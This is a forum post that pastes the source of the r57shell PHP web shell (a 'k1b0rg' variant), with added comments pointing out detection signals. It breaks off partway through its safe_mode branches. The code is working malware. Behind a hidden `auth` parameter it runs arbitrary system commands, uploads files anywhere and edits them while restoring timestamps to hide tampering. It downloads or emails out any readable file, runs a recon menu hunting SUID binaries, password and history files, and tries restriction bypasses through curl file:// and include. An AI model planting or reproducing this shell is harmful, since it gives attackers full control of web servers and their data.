
Zalivka shela v php skript

Shadow

Вобсчем так
<?php

// NOTE(defender): this listing is a web shell pasted into a host script; it names itself
// "r57shell" in the Basic-auth realm below. Everything is gated on the presence of an `auth`
// query parameter, and the else branch at the end of the file prints only "hello", so a plain
// visit to the page does not show the UI. Requests that add this parameter to a page that
// never used it are a useful access-log signal.
if(isset($_GET['auth']))
{

/*****************************************************************************************************/
// With $auth left at 0 the HTTP Basic check further down is skipped entirely.
$auth = 0;
// Credentials are stored and compared as unsalted MD5 hex digests; both digests are the same value.
$name='ec371748dc2da624b35a4f8f685dd122'; // (user login)
$pass='ec371748dc2da624b35a4f8f685dd122'; // (user password)
/******************************************************************************************************/
//error_reporting(0);
set_magic_quotes_runtime(0);
// Lift the execution time limit and turn off output buffering; '@' hides any warning output.
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
// Initial safe_mode flag comes from php.ini; it is re-evaluated later with a command probe.
$safe_mode = @ini_get('safe_mode');
// Compatibility shim for PHP older than 4.1.0: alias the long request arrays to the superglobals.
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
// Undo magic-quotes escaping so POST and SERVER values are used exactly as sent.
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}

// Optional HTTP Basic gate (inactive here because $auth is 0).
// NOTE(defender): the realm "r57shell" and the rst.void.ru link are fixed strings in this
// variant and work as content signatures when scanning a web root.
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Unauthorized');
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
}
}
$head = '<html>
<head>
<title>Modified by k1b0rg</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
BACKGROUND-COLOR: #D4D0C8;
}
.td1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
}
table {
BORDER-RIGHT: #eeeeee 1px outset;
BORDER-TOP: #eeeeee 1px outset;
BORDER-LEFT: #eeeeee 1px outset;
BORDER-BOTTOM: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>';
// In-memory ZIP archive builder used by the download and mail features of this script.
// It accumulates one local file record and one central-directory record per added file
// and concatenates them, followed by the end-of-central-directory record, in file().
class zipfile
{
// Local file records (header + compressed data), one string per added file.
var $datasec = array();
// Central-directory records, one string per added file.
var $ctrl_dir = array();
// End-of-central-directory signature "PK\x05\x06" followed by four zero bytes.
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
// Byte offset of the next local file record; advanced in addFile().
var $old_offset = 0;
// Packs a Unix timestamp (0 = current time) into a 32-bit DOS date/time value.
// Years before 1980 are clamped to 1980-01-01 00:00:00.
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
// Adds one file to the archive.
//   $data - file contents, $name - path stored in the archive, $time - Unix mtime (0 = now).
function addFile($data, $name, $time = 0)
{
// Archive paths use forward slashes.
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
// Reorder the hex digits pairwise, last pair first, into "\x.." escapes.
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
// NOTE(review): eval() turns the escape text into raw bytes. The input is generated above,
// not taken from the request, but eval() in a file is something code scanners flag.
eval('$hexdtime = "' . $hexdtime . '";');
// Local file header: signature "PK\x03\x04", then three 2-byte fields and the DOS time.
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
// Drop the first 2 and the last 4 bytes of the gzcompress() output.
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
// Central-directory record: signature "PK\x01\x02" and the same CRC, sizes and name.
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
// Offset of this file's local record, then advance the running offset.
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
// Returns the finished archive as one binary string: all local records, all
// central-directory records, then the end record with entry counts, directory size
// and directory offset.
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
// Optionally compresses a file dump before it is downloaded or mailed.
//   $filename (by reference) - gets '.bz2', '.gz' or '.zip' appended when compression is applied.
//   $filedump (by reference) - replaced with the compressed bytes.
//   $compress - 'bzip', 'gzip' or 'zip'; any other value leaves the data untouched.
// Results are also passed back through the globals $mime_type and (gzip only) $content_encoding.
// A format is used only if the matching PHP function exists; otherwise the final else applies.
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
// The name stored inside the archive is $filename without the '.zip' just appended.
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
// No compression: generic binary MIME type, data and name unchanged.
$mime_type = 'application/octet-stream';
}
}
// UI string table: form captions (text*), status/error messages (err*) and button labels (butt*).
// The key 'text21' appears three times with the same value; later entries overwrite earlier ones.
// NOTE(defender): the captions describe the feature set (command execution, upload, edit,
// download, mail-out), and literal strings such as the "Ahtung! ..." messages can serve as
// content signatures for this variant.
$lang=array(
'text1' =>'Executed command',
'text2' =>'Execute command on server',
'text3' =>'Run command',
'text4' =>'Work directory',
'text5' =>'Upload files on server',
'text6' =>'Local file',
'text7' =>'Aliases',
'text8' =>'Select alias',
'text9'=>'Work in safe_mode',
'text10'=>'ACCESS DENIED',
'text11'=>'Cat file',
'text12'=>' New name',
'text13'=>'File not found',
'text14'=>'Edit files',
'text15'=>'File for edit',
'text17'=>'File saved',
'text18'=>'file',
'text19'=>'Archivation',
'text20'=>'Upload file with server',
'text21'=>'no',
'text22'=>'Send file on e-mail',
'text23'=>'To',
'text24'=>'File',
'text21'=>'no',
'text21'=>'no',
'err0'=>'Ahtung! Can\'t write file!',
'err1'=>'Ahtung! Can\'t read file!',
'err2'=>'Ahtung! Can\'t edit file!',
'err6'=>'Ahtung! Letter not sended',
'err7'=>'Letter sended',
'butt1' =>'Execute',
'butt2' =>'Upload',
'butt3'=>'Edit file',
'butt4'=>'Download',
'butt5'=>'Show',
'butt6'=>'Send',
);
// Menu of canned shell commands: label => command line. Selecting a label in the UI
// substitutes the command line into $_POST['cmd'].
// NOTE(defender): the list is local reconnaissance -- SUID/SGID binaries, world-writable
// paths, configuration and credential files (config*, .htpasswd, service.pwd, .fetchmailrc),
// shell and MySQL history, listening ports. These exact command lines spawned by the
// web-server account are strong process-audit indicators (auditd/EDR). Limiting what the
// web-server user can read reduces what such a sweep returns.
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
// Reusable HTML fragments for the panel layout (table rows, fonts, form open/close tags).
// Every form built from $fs submits by POST to the same URL.
$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Wingdings color=gray>Ё</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";


// The working directory is taken from the request: every form carries a `dir` field and the
// script changes into it before doing anything else.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$windows = 0;
$unix = 0;
// Platform guess: a ':' as the second character of the path is treated as a Windows drive letter.
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
// If getcwd() returned nothing, fall back to the OS environment variable or php_uname().
if(empty($dir))
{
$os = getenv('OS');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
}

else
{
if(@eregi("^win",$os)) { $windows = 1; }
else { $unix = 1; }
}

// Command-execution probe: run `echo abcr57` through ex() and look for "r57" at offset 3.
// Any other result sets $safe_mode, which switches the UI to its file-only feature set.
// NOTE(defender): this probe runs on every page load that reaches this point, so a
// web-server worker spawning `echo abcr57` is a high-fidelity process-log indicator.
if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
// Returns a string of $i space characters, used for spacing in the generated HTML.
function ws($i)
{
return @str_repeat(" ",$i);
}
// Runs $cfe as an operating-system command and returns its output as a string.
// Returns '' when $cfe is empty or none of the mechanisms below is usable.
// NOTE(defender): five execution primitives are tried in order -- exec, shell_exec, system,
// passthru, popen -- so disabling only some of them in php.ini `disable_functions` leaves a
// working fallback; hardening has to cover the whole family (proc_open is not used here but
// belongs on the same list). Child processes of the web-server account are worth alerting on.
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
// exec() fills $res with an array of output lines; join them back into one string.
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
// system() prints directly, so its output is captured with output buffering.
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
// Last resort: popen() is attempted directly, without a function_exists() check.
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
// Prints a "can't write" error banner for the file name $i and returns null.
// $i is concatenated into the HTML without escaping.
function we($i)
{
$text = "[ - ] ERROR! Can't write in file ";
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
// Prints a "can't read" error banner for the file name $i and returns null.
// $i is concatenated into the HTML without escaping.
function re($i)
{
$text = "[ - ] ERROR! Can't read file ";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
// Prints a "can't create" error banner for the name $i and returns null.
// $i is concatenated into the HTML without escaping.
function ce($i)
{
$text = "Can't create ";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
// Formats a numeric file mode (as returned by fileperms()) as an ls-style string such as
// "drwxr-xr-x". Returns 0 without formatting when the global $windows flag is set.
function perms($mode)
{
if ($GLOBALS['windows']) return 0;
// File-type letter: the first mask below that shares any bit with $mode decides it.
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
// Read/write/execute flags for owner, group and world.
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
// setuid (0x800), setgid (0x400) and sticky (0x200) replace the execute letter:
// lower case when execute is also set, upper case when it is not.
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
// Builds an HTML <input> tag string.
//   $type, $name - emitted unquoted; $size - added only when non-zero; $value - emitted in
//   double quotes. None of the arguments is HTML-escaped.
function in($type,$name,$size,$value)
{
$ret = "<input type=".$type." name=".$name." ";
if($size != 0) { $ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\">";
return $ret;
}


// Builds one two-column table row: $t1 right-aligned in a cell $l percent wide, $t2 left-aligned.
function sr($l,$t1,$t2)
{
return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
}

// Page header: emits the HTML head and a status banner describing the host.
echo $head;
echo '</head>';
echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'
<font face=Webdings size=5><b>X3pn9!</b></font><b>'.ws(2).'</b>
</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
// Host fingerprint shown to the operator: safe_mode state, PHP version, disable_functions.
echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
echo ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
echo ws(2);
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
// Visitor address: the Client-IP and X-Forwarded-For request headers are preferred over
// REMOTE_ADDR; both headers are supplied by the client.
if (isset($_SERVER["HTTP_CLIENT_IP"])) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);

// Server address is resolved from the Host request header.
echo "
Your IP: [<font color=green>".$ip."</font>] Server IP: [<font color=green>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]" ;
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
echo $font;
if(!$windows){
echo '<font color=blue><b>uname -a :'.ws(1).'
pwd :'.ws(1).'</b></font>
';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
// NOTE(defender): `uname -a` is executed through ex() on every page view on non-Windows
// hosts, in addition to the `echo abcr57` probe -- another recurring child process to look for.
$uname = ex('uname -a');
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
"));
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
// Windows branch: php_uname() only, no command is spawned here.
echo '<font color=blue><b>OS :'.ws(1).'
<b>pwd :'.ws(1).'</b></font>
';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ws(3).@substr(@php_uname(),0,120)."
";
echo ws(3).$dir;
echo "
</font>";
}
echo "</font>";
echo "</td></tr></table>";
// cmd=edit_file: show the file named by e_name in a textarea for editing.
// The path comes straight from the request, so any file the PHP process can read is reachable.
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
{
// A failed "r+" open marks the file read-only for the UI; a failed "r" open reports an error.
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_POST['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
// File contents are HTML-escaped; the file name and directory echoed around them are not.
echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
// Hidden fields route the submitted text to the save_file handler.
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("

".$lang['err2']):("

<input type=submit name=submit value=\" ".$lang['butt3']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
// Nothing else of the panel is rendered while the editor is shown.
exit();
}
}
// Prints the message $lang['err'.$n] in a red banner, followed by $txt when given.
// Returns null. $txt is echoed without HTML escaping.
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
echo $GLOBALS['lang']['err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
// Sends $attach (array with 'type', 'name', 'content') to $to through PHP's mail().
// The message body is empty: the base64-encoded content is appended to the header string
// after a blank line. Returns 1 if mail() accepted the message, 0 otherwise.
// $from, $attach['type'] and $attach['name'] are concatenated into the headers as given.
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
// cmd=mail_file: read the file named by loc_file, optionally compress it, and mail it to
// the address in the `to` field.
// NOTE(defender): this is file exfiltration over the host's own mail path. The subject
// 'file from shell' and the sender 'billy@microsoft.com' are fixed in this variant, which
// makes them searchable in MTA logs; restricting outbound mail from web applications limits it.
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
{
if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
else
{
$filename = @basename($_POST['loc_file']);
$filedump = @fread($file,@filesize($_POST['loc_file']));
fclose($file);
// compress() reports its result through these two globals.
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
$attach = array(
"name"=>$filename,
"type"=>$mime_type,
"content"=>$filedump
);
$subj = 'file from shell';
$from = 'billy@microsoft.com';
$res = mailattach($_POST['to'],$from,$subj,$attach);
// err(6) is the failure message, err(7) the success message.
err(6+$res);
$_POST['cmd']="";
}
}
// cmd=download_file: return the file named by d_name as an attachment, optionally compressed.
// NOTE(defender): any file readable by the PHP process can be pulled this way. In access
// logs it appears as a POST to the host page answered with an attachment-type response,
// often far larger than the page normally returns.
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
else
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
// compress() reports its result through these two globals.
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
echo $content_encoding.';'.$mime_type.';'.$filename;
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
// File upload: copy the uploaded temp file into the directory given by the `dir` field,
// under either the original client file name or the `new_name` field.
// NOTE(defender): directory and file name both come from the request, so the file lands
// wherever the PHP process may write. Write-protecting the web root, keeping writable
// upload directories non-executable, and file-integrity monitoring address this.
if (!empty($HTTP_POST_FILES['userfile']['name']))
{

if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],$_POST['dir']."/".$nfn)
or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
// Alias selection: if the posted `alias` matches a label in $aliases, its command line
// replaces $_POST['cmd'] and is executed by the command handler further down.
if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
// cmd=save_file: overwrite the file named by e_name with the posted e_text.
// NOTE(defender): the modification time is read before the write and put back afterwards
// with touch(), so an edited file keeps its old mtime/atime. Do not rely on mtime when
// hunting for tampered files; compare content hashes against a known-good baseline and
// check the inode change time, which touch() does not set.
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
else {
// On non-Windows hosts CRLF line endings from the browser are converted to LF.
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang['text17']."</b></font></div></td></tr></table>";
}
}
// Main command handler: decides what to run, prints it, and writes the result into a textarea.
echo $table_up3;
// With no command posted, the default is a directory listing: `dir` on Windows, `ls -lia`
// elsewhere, or the built-in 'safe_dir' listing when command execution is unavailable.
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
// The command text is echoed back without HTML escaping.
echo $font.$lang['text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
// File-only feature set, used when the command probe failed.
if($safe_mode)
{
switch($_POST['cmd'])
{
// Directory listing built with dir()/stat(); no process is spawned.
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if($windows){
echo date("d.m.Y H:i",$mtime);
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[text10];
break;
// Print a file with file(), HTML-escaped line by line.
case 'safe_file':
if(@is_file($_POST['file']))
{
$file = @file($_POST['file']);
if($file)
{
$c = @sizeof($file);
for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
}
else echo $lang[text10];
}
else echo $lang[text13];
break;
// NOTE(defender): test1..test5 read files through extension code paths (curl file://,
// include, mb_send_mail extra parameters, imap_open) instead of fopen()/file(). Presumably
// these target restriction checks that those paths did not enforce in PHP builds of the
// time -- confirm against the version in use. Keeping PHP patched and not loading unused
// extensions (curl, imap, mbstring) removes this class of gap; /tmp/mb_send_mail is a
// file-system artifact of the test3 branch worth checking for.
case 'test1':
$ci = @curl_init("file://".$_POST['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
// include() of a request-supplied path: the target is parsed as PHP, not just displayed.
case 'test2':
@include($_POST['test2_file']);
break;
case 'test3':
